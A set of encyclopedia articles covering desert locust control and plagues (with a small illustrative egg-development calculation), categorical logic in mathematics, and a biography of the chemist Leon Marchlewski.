Correct application of the preventive strategy recommended by the FAO and the use of good treatment practices that are more respectful of people and the environment can limit the negative impacts of these large-scale sprayings. Social impact The external social costs to the local human population during desert locust outbreaks can be enormous, but difficult to estimate. Crop and pasture losses can lead to severe food shortages and a large imbalance in food rations, large price fluctuations in markets, insufficient availability of grazing areas, the sale of animals at very low prices to meet household subsistence needs and to buy feed for remaining animals, early transhumance of herds and high tensions between transhumant herders and local farmers, and significant human migration to urban areas (sometimes fatal for the elderly, the weak and young children). Other economic consequences can occur during harvest, as cereals can be contaminated with insect parts and downgraded to feed grains that are sold at a lower price. In addition, the negative income shock can have a long-term impact on the educational outcomes of children living in rural areas. Beneficial impact The potential benefits of locust swarms are seldom acknowledged. However, locusts are not all bad, as the biomass of locust individuals contributes greatly to ecosystem processes in case of an invasion. Locust frass and cadavers are rich in nutrients which are transferred to the soil via decomposition by micro-organisms and fungi, absorbed by plants, increasing net ecosystem productivity and ecosystem nutrient cycling through rapid mineralization rates of nitrogen and carbon. Early warning and preventive control Early warning and preventive control is the strategy adopted by locust-affected countries in Africa and Asia to try to stop locust plagues from developing and spreading. In the 1920s-1930s, locust control became a major field for international cooperation. The International Agricultural Institute developed several programmes aimed at exchanging data about the desert locust, and international conferences were held in the 1930s: Rome in 1931, Paris in 1932, London in 1934, Cairo in 1936, and Brussels in 1938. Colonial empires were heavily involved in these attempts to control locust pests, which heavily affected the Middle East and parts of Africa. The USSR also used locust control as a way to expand its influence in the Middle East and Central Asia. FAO's Desert Locust Information Service (DLIS) in Rome monitors the weather, ecological conditions, and the locust situation on a daily basis. DLIS receives results of survey and control operations carried out by national teams in affected countries. The teams use a variety of innovative digital devices, such as eLocust3, to collect, record and transmit standardized data in real time to their national locust centres for decision-making. These data are automatically integrated into SWARMS, the global monitoring and early warning system operated by DLIS. Within this system, the field data are combined with the latest satellite imagery to actively monitor rainfall, vegetation and soil moisture conditions in the locust breeding area from West Africa to India. This is supplemented by sub-seasonal and seasonal temperature and rainfall predictions up to six months in advance as well as other weather forecasts and data from NOAA and ECMWF. Models are used to estimate egg and hopper development rates and swarm trajectories (NOAA HYSPLIT) and dispersion (UK Met Office NAME). 
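The development-rate models mentioned above can be given a minimal illustration with a degree-day calculation, in which development advances only on days warm enough to exceed a threshold. The sketch below is hedged: the threshold (BASE_TEMP_C) and heat-unit requirement (EGG_DEGREE_DAYS) are invented placeholder values, not FAO parameters, and the operational models (like the HYSPLIT and NAME trajectory models named above) are far more sophisticated.

```python
# Illustrative degree-day sketch of an egg-development estimate.
# Both constants below are made-up placeholders for illustration only.

BASE_TEMP_C = 15.0        # assumed temperature below which development stops
EGG_DEGREE_DAYS = 150.0   # assumed heat units required before hatching

def predicted_hatch_day(daily_mean_temps_c):
    """Return the index of the day eggs are predicted to hatch,
    or None if the series ends before enough heat accumulates."""
    accumulated = 0.0
    for day, temp in enumerate(daily_mean_temps_c):
        accumulated += max(0.0, temp - BASE_TEMP_C)
        if accumulated >= EGG_DEGREE_DAYS:
            return day
    return None

# Warmer weather accumulates heat units faster, so hatching is earlier:
print(predicted_hatch_day([30.0] * 30))  # -> 9  (hatches on the 10th day)
print(predicted_hatch_day([25.0] * 30))  # -> 14 (cooler weather delays hatching)
```

The same accumulate-until-a-requirement-is-met structure, driven by the satellite-derived temperature and soil-moisture data described above, is what lets forecasters estimate when hatching and fledging will occur in each breeding area.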
DLIS uses a custom GIS to analyze the field data, satellite imagery, weather predictions and model results to assess the current situation and forecast the timing, scale, and location of breeding and migration up to six weeks in advance. The situation assessments and forecasts are published in monthly locust bulletins that date back to the 1970s. These are supplemented by warnings and alerts to affected countries and the international community. This information is available on the FAO Locust Watch website. DLIS continuously adopts the latest technologies as innovative tools, including drones, to improve monitoring and early warning. FAO also provides information and training to affected countries and coordinates funding from donor agencies in case of major upsurges and plagues. The desert locust is a difficult pest to control, and control is further complicated by the large and often remote areas where locusts can be found. Undeveloped basic infrastructure in some affected countries, limited resources for locust monitoring and control, and political turmoil within and between affected countries further reduce the capacity of a country to undertake the necessary monitoring and control activities. At present, the primary method of controlling desert locust infestations is with insecticides applied in small, concentrated doses by vehicle-mounted and aerial sprayers at ultra-low volume rates of application. The insecticide is acquired by the insect directly, meaning that control must be precise. Control is undertaken by government agencies in locust-affected countries or by specialized regional aerial organizations such as the Desert Locust Control Organization for East Africa (DLCO-EA). The desert locust has natural enemies such as predatory wasps and flies, parasitoid wasps, predatory beetle larvae, birds, and reptiles. These may be effective at keeping solitary populations in check but are of limited effect against gregarious desert locusts because of the enormous numbers of insects in the swarms and hopper bands. Farmers often try mechanical means of killing locusts, such as digging trenches and burying hopper bands, but this is very labour-intensive and is difficult to undertake when large infestations are scattered over a wide area. Farmers also try to scare locust swarms away from their fields by making noise, burning tires, or other methods. This tends to shift the problem to neighbouring farms, and locust swarms can easily return to reinfest previously visited fields. Biopesticides Biopesticides include fungi, bacteria, neem extract, and pheromones. The effectiveness of many biopesticides equals that of conventional chemical pesticides, but two distinct differences exist. Biopesticides in general take longer to kill insects, suppress plant diseases, or control weeds, usually between 2 and 10 days. The two types of biopesticides are biochemical and microbial. Biochemical pesticides are similar to naturally occurring chemicals and are nontoxic, such as insect pheromones used to locate mates, while microbial biopesticides come from bacteria, fungi, algae, or viruses that either occur naturally or are genetically altered. Entomopathogenic fungi generally suppress pests by mycosis, causing a disease that is specific to the insect. Biological control products have been under development since the late 1990s; Green Muscle and NOVACRID are based on a naturally occurring entomopathogenic fungus, Metarhizium acridum. 
Species of Metarhizium are widespread throughout the world, infecting many groups of insects, but pose low risk to humans, other mammals, and birds. The species M. acridum has specialised in short-horned grasshoppers, to which these locusts belong, so it has been chosen as the active ingredient of the product. The product is available in Australia under the name Green Guard; in Africa, it used to be available as Green Muscle. However, since Green Muscle seems to have disappeared from the market, another product, NOVACRID, was developed for Africa, Central Asia, and the Middle East. These products are applied in the same way as chemical insecticides, but do not kill as quickly. At recommended doses, the fungus can take up to two weeks to kill up to 90% of the locusts. For that reason, it is recommended for use mainly against hoppers, the wingless early stages of locusts. These are mostly found in the desert, far from cropping areas, where the delay in death does not result in damage. The advantage of the product is that it affects only grasshoppers and locusts, which makes it much safer than chemical insecticides. Specifically, it allows the natural enemies of locusts and grasshoppers to continue preying upon them. These include birds, parasitoid and predatory wasps, parasitoid flies, and certain species of beetles. Though natural enemies cannot prevent plagues, they can limit the frequency of outbreaks and contribute to their control. Biopesticides are also safer to use in environmentally sensitive areas such as national parks or near rivers and other water bodies. Green Muscle was developed under the LUBILOSA programme, which was initiated in 1989 in response to environmental concerns over the heavy use of chemical insecticides to control locusts and grasshoppers during the 1987-89 plague. The project focused on the use of beneficial disease-causing microorganisms (pathogens) as biological control agents for grasshoppers and locusts. These insects were considered too mobile and too fecund for their numbers to be curbed by classical biological control. Pathogens bear a distinct advantage in that many can be produced in artificial culture in large quantities and be used with widely available spraying equipment. Entomopathogenic fungi were traditionally regarded as needing humid conditions to be effective. However, the LUBILOSA programme devised a method to overcome this by spraying fungal spores in an oil formulation. Even under desert conditions, Green Muscle can be used to kill locusts and other acridid pests, such as the Senegalese grasshopper. During trials in Algeria and Mauritania in 2005 and 2006, various natural enemies, but especially birds, were abundant enough to eliminate treated hopper bands in about a week, because the diseased hoppers became sluggish and easy to catch. Desert locust plagues and upsurges During the 20th century, there were six major desert locust plagues, one of which lasted almost 13 years. 1915 Ottoman Syria locust infestation From March to October 1915, swarms of locusts stripped areas in and around Palestine, Mount Lebanon and Syria of almost all vegetation. This infestation seriously compromised the already-depleted food supply of the region and sharpened the misery of all Jerusalemites. 1960s to present Since the early 1960s, there have been two desert locust plagues (1967-1968 and 1986-1989) and six desert locust upsurges (1972-1974, 1992-1994, 1994-1996, 1996-1998, 2004-2005, and 2019-2021). 
2004–2005 upsurge (West Africa) From October 2003 to May 2005, West Africa faced the largest and most numerous desert locust infestations in 15 years. The upsurge started as small, independent outbreaks that developed in Mauritania, Mali, Niger, and Sudan in the autumn of 2003. Two days of unusually heavy rains that stretched from Dakar, Senegal, to Morocco in October allowed breeding conditions to remain favourable for the next six months, and desert locust numbers rapidly increased. Lack of rain and cold temperatures in the winter breeding area of northwest Africa in early 2005 slowed the development of the locusts and allowed the locust control agencies to stop the cycle. During the upsurge, nearly were treated by ground and aerial operations in 23 countries. The costs of fighting this upsurge have been estimated by the FAO to have exceeded US$400 million, and harvest losses were valued at up to US$2.5 billion, which had disastrous effects on food security in West Africa. The countries affected by the 2004-2005 upsurge were Algeria, Burkina Faso, the Canary Islands, Cape Verde, Chad, Egypt, Ethiopia, the Gambia, Greece, Guinea, Guinea-Bissau, Israel, Jordan, Lebanon, Libyan Arab Jamahiriya, Mali, Mauritania, Morocco, Niger, Saudi Arabia, Senegal, Sudan, Syria, and Tunisia. 2019–2021 desert locust upsurge In May 2018, Cyclone Mekunu brought unprecedented rainfall to the Empty Quarter of the Arabian Peninsula and was followed by Cyclone Luban, which brought heavy rains to the same area in October. This allowed conditions to be favourable for three generations of breeding, which caused an estimated 8,000-fold increase in desert locust numbers that went unchecked because the area was so remote it could not be accessed by national locust teams. In early 2019, waves of swarms migrated from this remote and inaccessible area north to the interior of Saudi Arabia and southern Iran, and southwest to the interior of Yemen. Both areas received good rains, including heavy flooding in southwest Iran (the worst in 50 years), which allowed another two generations of breeding to take place. While control operations were mounted against the northern movement and subsequent breeding, very little could be done in Yemen due to the ongoing conflict. As a result, new swarms formed that crossed the southern Red Sea and the Gulf of Aden and invaded the Horn of Africa, specifically northeast Ethiopia and northern Somalia in June 2019. Again, good rains allowed further breeding during the summer, followed by another generation of widespread breeding during the autumn in eastern Ethiopia and central Somalia, which was exacerbated by the unusually late-occurring Cyclone Pawan in northeast Somalia in early December. The swarms that subsequently formed invaded Kenya in late December 2019 and spread throughout the country, where they bred between the rainy seasons because of unusual rainfall. Kenya had only witnessed swarm invasions twice in the past 75 years (1955 and 2007). Some swarms also invaded Uganda, South Sudan, and Tanzania, and one small swarm reached northeast D.R. Congo, the first time since 1945. The situation improved in Kenya and elsewhere by the summer of 2020 due to large-scale aerial control operations, made available by generous assistance from international partners. Nevertheless, food security and livelihoods were impacted throughout the region. 
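As a consistency check on the figures above (simple arithmetic on the text's own numbers, not an additional estimate from the sources): an 8,000-fold increase over three generations corresponds to a constant per-generation growth factor r with

\[
r^{3} = 8000, \qquad r = \sqrt[3]{8000} = 20,
\]

that is, roughly a 20-fold increase per generation, just above the 10- to 16-fold range quoted earlier for a single generation under ordinary conditions.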
Despite the control efforts, good rains continued to fall and breeding occurred again during the summer and autumn in Ethiopia and Somalia, which led to another invasion of Kenya in December 2020, eventually brought under control by spring 2021. Again, unexpected rains fell in late April and early May, this time further north, allowing substantial breeding to occur in eastern Ethiopia and northern Somalia in May and June 2021. New swarms formed in June and July that moved to northeast Ethiopia for a generation of breeding that could not be addressed due to conflict and insecurity, which prolonged the upsurge in the Horn of Africa. The upsurge was finally brought under control by early 2022 as a result of successful and intensive control operations in northern Somalia and poor rainfall. As of 2022, there are no locust crises anywhere in the world, but swarms are expected in October in the Sahel, Yemen and on the India–Pakistan border. In southwest Asia, the upsurge was brought under control much earlier because of a massive effort undertaken by India and Pakistan along both sides of their common border during the summer of 2020. This followed earlier control operations by Iran during the spring of 2019 and 2020, and by Pakistan and India during the summer of 2019. In June 2020, Cyclone Nisarga helped spread swarms across the northern states of India where a few reached the Himalayan foothills in Nepal. In response to the upsurge, the Director-General of FAO declared a Level 3 corporate-wide emergency, the highest level in the UN system, on 17 January 2020 and appealed for immediate international assistance to rapidly upscale monitoring and control activities in the Horn of Africa. One month later, Somalia declared a state of emergency. Similarly, Pakistan also declared a state of emergency. The UN continued to warn that the Horn of Africa was facing a dangerous situation. Fortunately, the international community responded quickly and generously despite other urgent situations such as COVID-19, and the $230 million appeal by FAO was fully funded. This allowed ground and aerial operations to treat of desert locust in the Horn of Africa and Yemen in 2020 and 2021. Up to 20 aircraft were deployed simultaneously, supported by hundreds of ground teams, and more than 1.4 million locations were surveyed. These collective efforts averted of crop losses, saved of milk production, and secured food for nearly 47 million people. The commercial value of the cereal and milk loss averted is estimated at $1.77 billion. FAO's Locust Watch contains the latest situation and forecasts as well as a full, detailed description of the recent upsurge. Pheromones The swarming pheromone guaiacol is produced in the gut of desert locusts by the breakdown of plant material. This process is undertaken by the gut bacterium Pantoea (Enterobacter) agglomerans. Guaiacol is one of the main components of the pheromones that cause locust swarming. Pheromones also accelerate S. gregaria development. Mahamat et al., 1993 find that an undifferentiated mix of several volatiles derived from the males of the species (including guaiacol) speeds up the maturation process of both immature males and females. S. gregaria was one of the organisms examined by McNeill and Hoyle (1967), who found it to have thinner muscle filaments than any previously described. This contributed greatly to the development of the sliding filament theory. Westerman showed that exposure of S. 
gregaria males to a dose of X-rays during the S-phase (DNA synthesis phase) of spermatogonial mitoses and during the early stages of meiosis (leptotene-early zygotene stages) caused a significant increase in chiasmata frequency when scored at the later stages (diplotene-diakinesis stages) of meiosis. These results indicated that the formation of chiasmata is not an isolated event but the end product of an interrelated series of processes initiated at some earlier stage of meiosis. In culture Given the long history of the desert locust, it is to be expected that references to the world's most dangerous migratory pest have crept into popular film and literature, as well as many of the world's religions. Film Owing to the destructive habits of locusts, they have been a representation of famine in many Middle Eastern cultures, and are seen in the movies The Mummy (1999) and The Bible (1966). Religious books This species has been identified as one of the kosher species of locusts mentioned in Leviticus 11:22 by several rabbinical authorities among Middle Eastern Jewish communities. Literature 1939 - The Day of the Locust by Nathanael West. 1948 - Poka by Premendra Mitra. References Further reading AFROL News, Stronger efforts to fight West Africa's locusts, Oct. 1, 2004. Lindsey, R. 2002. Locust! OECD, The Desert Locust Outbreak in West Africa, Sept. 23, 2004. Programme on biological control of locusts and grasshoppers (LUBILOSA). Nature Magazine Article on combating desert locust through natural enemies Jahn, G. C. 1993. Supplementary environmental assessment of the Eritrean Locust Control Program. USAID, Washington DC. Abdin, O., Stein, A., van Huis, A., 2001. Spatial distribution of the desert locust, Schistocerca gregaria, in the plains of the Red Sea coast of Sudan during the winter of 1999. van der Werf, W., Woldewahid, G., Abate, T., Butrous, M., Abdalla, O., Khidir, A. M., Mustafa, B., Magzoub, I., Abdin, O., Stein, A., & van Huis, A., 2002. Spatial distribution of the Desert Locust, Schistocerca gregaria, in the plains of the Red sea coast of Sudan during the winter of 1999. In Conference on agricultural and environmental statistical applications / F. Piersimoni, Rome, 5-7 June 2001 (pp. 167-171). Ceccato, P., K. Cressman, A. Giannini, S. Trzaska. 2007. The desert locust upsurge in West Africa (2003–2005): Information on the desert locust early warning system and the prospects for seasonal climate forecasting. International Journal of Pest Management, 53(1): 7-13. http://dx.doi.org/10.1080/09670870600968826 Chapuis, M.P., Plantamp, C., Blondin, L., Pagès, C., Lecoq, M., 2014. Demographic processes shaping genetic variation of the solitarious phase of the desert locust. Molecular Ecology 23 (7): 1749-1763. https://doi.org/10.1111/mec.12687 Cressman, K. 1996. Current methods of desert locust forecasting at FAO. Bulletin OEPP/EPPO Bulletin 26: 577–585. https://www.fao.org/ag/locusts/common/ecg/190/en/1996_EPPO_Cressman_Forecasting.pdf Cressman, K. 2008. The use of new technologies in Desert Locust early warning. Outlooks on Pest Management (April, 2008): 55–59. https://doi.org/10.1564/19apr03 Cressman, K. 2013. Role of remote sensing in desert locust early warning. J. Appl. Remote Sens. 7 (1): 075098; https://doi.org/10.1117/1.JRS.7.075098 Cressman, K. 2013. Climate change and locusts in the WANA Region. In M.V.K. Sivakumar et al. 
(eds.), Climate Change and Food Security in West Asia and North Africa. (pp. 131–143). Netherlands: Springer. https://doi.org/10.1007/978-94-007-6751-5_7 Cressman, K. 2016. Desert Locust. In: J.F. Shroder, R. Sivanpillai (eds.), Biological and Environmental Hazards, Risks, and Disasters (pp. 87–105). USA: Elsevier. https://www.fao.org/ag/locusts/common/ecg/190/en/1512_Bio_hazard_book_chapter.pdf Dinku, T., Ceccato, P., Cressman, K., and Connor, S.J. 2010. Evaluating detection skills of satellite rainfall estimates over Desert Locust recession regions. J Applied Meteorology and Climatology 49 (6): 1322-1332. https://doi.org/10.1175/2010JAMC2281.1 Gay, P.-E., Lecoq, M., Piou, C., 2018. Improving preventive locust management: insights from a multi-agent model. Pest Management Science 74(1):46-58. https://doi.org/10.1002/ps.4648 Gay, P.-E., Lecoq, M., Piou, C., 2019. The limitations of locust preventive management faced with spatial uncertainty: exploration with a multi-agent model. Pest Management Science 76: 1094-1102. https://doi.org/10.1002/ps.5621 Gay, P.E., Trumper, E., Lecoq, M., Piou, C. 2021. Importance of field knowledge and experience to improve pest locust management. Pest Management Science. https://doi.org/10.1002/ps.6587 Guershon, M. & A. Ayali, 2012. Innate phase behavior in the desert locust, Schistocerca gregaria. Insect Science 19(6): 649-656. https://doi.org/10.1111/j.1744-7917.2012.01518.x Kayalto M., Idrissi Hassani M., Lecoq M., Gay P.E., Piou C., 2020. Cartographie des zones de reproduction et de grégarisation du criquet pèlerin au Tchad [Mapping of the breeding and gregarization areas of the desert locust in Chad]. Cahiers Agricultures 29:14 https://doi.org/10.1051/cagri/2020011 Lazar, M., Piou, C., Doumandji-Mitiche, B., Lecoq, M., 2016. Importance of solitarious Desert locust population dynamics: lessons from historical survey data in Algeria. Entomologia Experimentalis et Applicata 161:168-180. https://doi.org/10.1111/eea.12505 Lecoq, M., 1999. Projet de restructuration des organismes chargés de la surveillance et de la lutte contre le criquet pèlerin en région occidentale. Justifications et propositions [Project for the restructuring of the organizations responsible for monitoring and control of the desert locust in the Western Region. Justifications and proposals]. Food and Agriculture Organisation of the United Nations (FAO), Rome. 36 p. http://dx.doi.org/10.13140/RG.2.2.36765.95203 Lecoq, M., 2001. Recent progress in Desert and Migratory Locust management in Africa. Are preventive actions possible? Journal of Orthoptera Research 10(2): 277-29. https://doi.org/10.1665/1082-6467(2001)010%5B0277:RPIDAM%5D2.0.CO;2 Lecoq, M., 2005. Desert locust management: from ecology to anthropology. Journal of Orthoptera Research 14(2):179-186. https://doi.org/10.1665/1082-6467(2005)14%5B179:DLMFET%5D2.0.CO;2 Lecoq, M., 2019. Desert Locust Schistocerca gregaria (Forskål, 1775) (Acrididae). In: Lecoq M., Zhang L. Sc. Ed. Encyclopedia of Pest Orthoptera of the World, China Agricultural University Press, Beijing. Pp. 204-212 Lecoq, M., Cease, A., 2022. What have we learned after millennia of locust invasions? Agronomy 12, 472. https://doi.org/10.3390/agronomy12020472 Liu, J., Lecoq, M., Zhang, L., 2021. Desert locust stopped by Tibetan highlands during the 2020 upsurge. Agronomy 11, 2287. https://doi.org/10.3390/agronomy11112287 Magor, J. I., Lecoq, M., Hunter, D.M. 2008. Preventive control and Desert Locust plagues. Crop Protection 27: 1527-1533. 
https://doi.org/10.1016/j.cropro.2008.08.006 Meynard, C., Gay, P.-E., Lecoq, M., Foucart, A., Piou, C., Chapuis, M.P., 2017. Climate-driven geographic distribution of the desert locust during recession periods: Subspecies' niche differentiation and relative risks under scenarios of climate change. Global Change Biology 23(11) https://doi.org/10.1111/gcb.13739 Meynard, C.N., Lecoq, M., Chapuis, M.P., Piou, C., 2020. On the relative role of climate change and management in the current Desert Locust outbreak in East Africa. Global Change Biology 26:3753–3755. https://doi.org/10.1111/gcb.15137 Pekel, J., Ceccato, P., Vancutsem, C., Cressman, K., Vanbogaert, E. and Defourny, P. 2010. Development and application of multi-temporal colorimetric transformation to monitor vegetation in the Desert Locust habitat. IEEE J. of Selected Topics in Applied Earth Observations and Remote Sensing 4 (2): 318-326. Piou, C., Gay, P.-E., Benahi, A.S., Ould Babah Ebbe, M.A., Chihrane, J., Ghaout, S., Cisse, S., Diakite, F., Lazar, M., Cressman, K., Merlin, O., Escorihuela, M.J., 2019. Soil moisture from remote sensing to forecast desert locust presence. Journal of Applied Ecology 2019:1–10. https://doi.org/10.1111/1365-2664.13323 Piou, C., Jaavar Bacar, M., Babah Ebbe, M.A.O., Chihrane, J., Ghaout, S., Cisse, S., Lecoq, M., Ben Halima, T. 2017. Mapping the spatiotemporal distributions of the Desert Locust in Mauritania and Morocco to improve preventive management. Basic and Applied Ecology 25:37-47. https://doi.org/10.1016/j.baae.2017.10.002 Piou, C., Lebourgeois, V., Ahmed Salem Benahi, Bonnal, V., Mohamed El Hacen Jaavar, Lecoq, M., Vassal, J.M., 2013. Coupling historical prospection data and a remote-sensing vegetation index for the preventative control of Desert Locust. Basic and Applied Ecology 14:593-604. https://doi.org/10.1016/j.baae.2013.08.007 Showler, A.T., Lecoq, M. 2021. Incidence and ramifications of armed conflict in countries with major desert locust breeding areas. Agronomy 11, 114 https://doi.org/10.3390/agronomy11010114 Showler, A.T., Ould Babah Ebbe, M.A., Lecoq, M., Maeno, K.O., 2021. Early intervention against desert locusts: Current proactive approach and the prospect of sustainable outbreak prevention. Agronomy 11, 312. https://doi.org/10.3390/agronomy11020312 Stefanski, R. and K. Cressman. 2015. Weather and Desert Locust. World Meteorological Organization, Geneva, Switzerland. Sultana, R., Samejo, A.A., Kumar, S., Soomro, S., Lecoq, M. 2021. The 2019-2020 upsurge of the desert locust and its impact in Pakistan. Journal of Orthoptera Research 30(2): 145–154. https://doi.org/10.3897/jor.30.65971 Symmons, P. & A. van Huis, 1997. Desert Locust Control campaign studies: operations guidebook. Wageningen University. 167 pp. & CD-Rom, 19 floppy disks. Symmons, P.M. and K. Cressman. 2001. Desert Locust Guidelines: I. Survey. Food and Agriculture Organization of the United Nations, Rome, Italy. Therville, C., Anderies, J.M., Lecoq, M., Cease, A. 2021. Locusts and People: Integrating the social sciences in sustainable locust management. Agronomy 11, 951. https://doi.org/10.3390/agronomy11050951 Van Huis, A. 1994. Desert locust control with existing techniques: an evaluation of strategies. Proceedings of the Seminar held in Wageningen, the Netherlands, 6–11 December 1993. 132 pp. Van Huis, A. 1995. Desert locust plagues. Endeavour, 19(3): 118–124. Van Huis, A. 1997. Can we prevent desert locust plagues? In: New strategies in locust control (Eds.: S. Krall, R. Peveling and D.B. Diallo), pp. 453–459. 
Birkhäuser Verlag, Basel. 522 pp. Vallebona C, Genesio L, Crisci A, Pasqui M, Di Vecchia A, Maracchi G (2008). Large-scale climatic patterns forcing desert locust upsurges in West Africa. Climate Research 37: 35–41. https://www.int-res.com/abstracts/cr/v37/n1/p35-41/ Waldner, F., Defourny, P., Babah Ebbe, M. A., and Cressman, K. 2015. Operational Monitoring of the Desert Locust Habitat with Earth Observation: An Assessment. Int. J. Geo-Inf. 4 (1): 2379-2400 https://doi.org/10.3390/ijgi4042379 Walford, G. F. 1963. Arabian Locust Hunter. London, Robert Hale. Zhang, L., Lecoq, M., Latchininsky, A., Hunter, D., 2019. Locust and grasshopper management. Annual Review of Entomology 64(1):15-34. https://doi.org/10.1146/annurev-ento-011118-112500 External links Desert Locust crisis in the Horn of Africa - FAO Website FAO Locust Watch site Lubilosa site Delivery systems Why Locusts Swarm: A Study Finds 'Tipping Point' Columbia University IRI Climate and Desert Locust Desert Locust Meteorological Monitoring, at Sahel Resources Cultivation of locusts for the pet trade Modelling insect wings using the finite element method Locusts Orthoptera of Africa Insects described in 1775 Agricultural pest insects Food security Animal migration Orthoptera of Asia Insect pests of millets
Desert locust
[ "Biology" ]
10,214
[ "Ethology", "Behavior", "Animal migration" ]
1,063,799
https://en.wikipedia.org/wiki/Categorical%20logic
Categorical logic is the branch of mathematics in which tools and concepts from category theory are applied to the study of mathematical logic. It is also notable for its connections to theoretical computer science. In broad terms, categorical logic represents both syntax and semantics by a category, and an interpretation by a functor. The categorical framework provides a rich conceptual background for logical and type-theoretic constructions. The subject has been recognisable in these terms since around 1970. Overview There are three important themes in the categorical approach to logic: Categorical semantics Categorical logic introduces the notion of structure valued in a category C, with the classical model-theoretic notion of a structure appearing in the particular case where C is the category of sets and functions. This notion has proven useful when the set-theoretic notion of a model lacks generality and/or is inconvenient. R.A.G. Seely's modeling of various impredicative theories, such as System F, is an example of the usefulness of categorical semantics. It was found that the connectives of pre-categorical logic were more clearly understood using the concept of adjoint functor, and that the quantifiers, too, were best understood as adjoints. Internal languages This can be seen as a formalization and generalization of proof by diagram chasing. One defines a suitable internal language naming relevant constituents of a category, and then applies categorical semantics to turn assertions in a logic over the internal language into corresponding categorical statements. This has been most successful in the theory of toposes, where the internal language of a topos together with the semantics of intuitionistic higher-order logic in a topos enables one to reason about the objects and morphisms of a topos as if they were sets and functions. This has been successful in dealing with toposes that have "sets" with properties incompatible with classical logic. A prime example is Dana Scott's model of untyped lambda calculus in terms of objects that retract onto their own function space. Another is the Moggi–Hyland model of system F by an internal full subcategory of the effective topos of Martin Hyland. Term model constructions In many cases, the categorical semantics of a logic provide a basis for establishing a correspondence between theories in the logic and instances of an appropriate kind of category. A classic example is the correspondence between theories of βη-equational logic over simply typed lambda calculus and Cartesian closed categories. Categories arising from theories via term model constructions can usually be characterized up to equivalence by a suitable universal property. This has enabled proofs of meta-theoretical properties of some logics by means of an appropriate categorical algebra. For instance, Freyd gave a proof of the disjunction and existence properties of intuitionistic logic this way. These three themes are related. The categorical semantics of a logic consists in describing a category of structured categories that is related to the category of theories in that logic by an adjunction, where the two functors in the adjunction give the internal language of a structured category on the one hand, and the term model of a theory on the other. See also History of topos theory Coherent topos Notes References Books Seminal papers Further reading Fairly accessible introduction, but somewhat dated. 
The categorical approach to higher-order logics over polymorphic and dependent types was developed largely after this book was published. A comprehensive monograph written by a computer scientist; it covers both first-order and higher-order logics, and also polymorphic and dependent types. The focus is on fibred categories as a universal tool in categorical logic, necessary in dealing with polymorphic and dependent types. Version available online at John Bell's homepage. A preliminary version. Systems of formal logic Theoretical computer science
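To illustrate the adjoint-functor reading of connectives and quantifiers mentioned in the overview (standard material going back to Lawvere; the notation here is an illustrative choice, not drawn from the references listed): for the projection π : X × Y → X, substitution along π sends a predicate ψ on X to a predicate on X × Y, and the existential and universal quantifiers along Y are its left and right adjoints,

\[
\exists_{\pi} \dashv \pi^{*} \dashv \forall_{\pi},
\qquad\text{i.e.}\qquad
\frac{\exists y.\,\varphi(x,y) \vdash \psi(x)}{\varphi(x,y) \vdash \psi(x)}
\qquad
\frac{\psi(x) \vdash \forall y.\,\varphi(x,y)}{\psi(x) \vdash \varphi(x,y)}
\]

Likewise, the term-model correspondence between simply typed lambda calculi and Cartesian closed categories rests on the currying bijection \(\mathrm{Hom}(\Gamma \times A, B) \cong \mathrm{Hom}(\Gamma, B^{A})\), which is exactly what interprets λ-abstraction.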
Categorical logic
[ "Mathematics" ]
785
[ "Mathematical structures", "Categorical logic", "Theoretical computer science", "Applied mathematics", "Mathematical logic", "Category theory" ]
1,063,811
https://en.wikipedia.org/wiki/Leon%20Marchlewski
Leon Paweł Teodor Marchlewski (15 December 1869 – 16 January 1946) was a Polish chemist, the first Director and Honorary Member of the Polish Chemical Society. He was one of the founders of the field of chlorophyll chemistry and a precursor of clinical chemistry. Life and career He was born in 1869 in Włocławek, Congress Poland, to father Józef Marchlewski, a merchant, and mother Emilia (née Rückersfeldt), a governess. His older brother was the communist activist Julian Marchlewski. In 1888, he went to Zürich and studied chemistry at the ETH Zurich. In 1890, he became an assistant to Professor Georg Lunge. After two years, he earned his doctoral degree. He subsequently went to Kersal near Manchester, where he became an assistant of Edward Schunck. In this period he collaborated with Marceli Nencki and conducted research on the chemical affinity of dyes in the animal and plant worlds. Between 1896 and 1897, he was on a scientific scholarship granted for his research in the field of organic chemistry from the Kraków-based Academy of Learning (Polish: Akademia Umiejętności, AU). He also taught organic chemistry at the Institute of Science and Technology of the University of Manchester. In 1900, he returned to Poland and obtained his habilitation on the basis of his thesis Die Chemie des Chlorophylls (The Chemistry of Chlorophyll) and a lecture titled Dzisiejszy stan teoryi tautomeryi (The Present State of the Theory of Tautomerism). In the years 1900–1906, he worked as a senior inspector at the General Department of Food Research in Kraków headed by Odo Bujwid. He also became a professor at the Jagiellonian University and served as the university's rector in the academic years 1926–1927 and 1927–1928. From 1906 to 1939 he was Head of the Institute of Medicinal Chemistry. In 1917–1919, he established the National Scientific Institute of Agricultural Economy in Puławy. He was the first director of the Polish Chemical Society and served as the first director of YMCA in Poland. His scientific work mostly focused on the areas of organic, inorganic and analytic chemistry as well as biochemistry. His scientific achievements include research on chlorophyll and the blood pigment hemoglobin, which demonstrated the similarity of chemical structures in plants and animals, indicating a common origin. He was nominated for the Nobel Prize in Physiology or Medicine in 1913 and 1914. He used a diplomatic passport in 1927 to attend an international conference on chemistry in Paris. Marchlewski was also a long-time political activist in the Polish peasant movement. In December 1945, he became a member of the National Council, representing the Polish People's Party. He died several days later and was buried at the Rakowicki Cemetery. Honours Commander's Cross of the Order of Polonia Restituta (1925) Gold Cross of Merit (1936) Commander's Cross of the Order of Dannebrog 2nd Class See also List of Polish chemists Timeline of Polish science and technology References External links 1869 births 1946 deaths Burials at Rakowicki Cemetery People from Włocławek Polish senators Polish chemists Chemical pathologists Members of the Lwów Scientific Society Rectors of the Jagiellonian University Commanders of the Order of Polonia Restituta People from Congress Poland Commanders of the Order of the Dannebrog ETH Zurich alumni
Leon Marchlewski
[ "Chemistry" ]
703
[ "Chemical pathology", "Chemical pathologists" ]
1,063,891
https://en.wikipedia.org/wiki/Hilary%20Koprowski
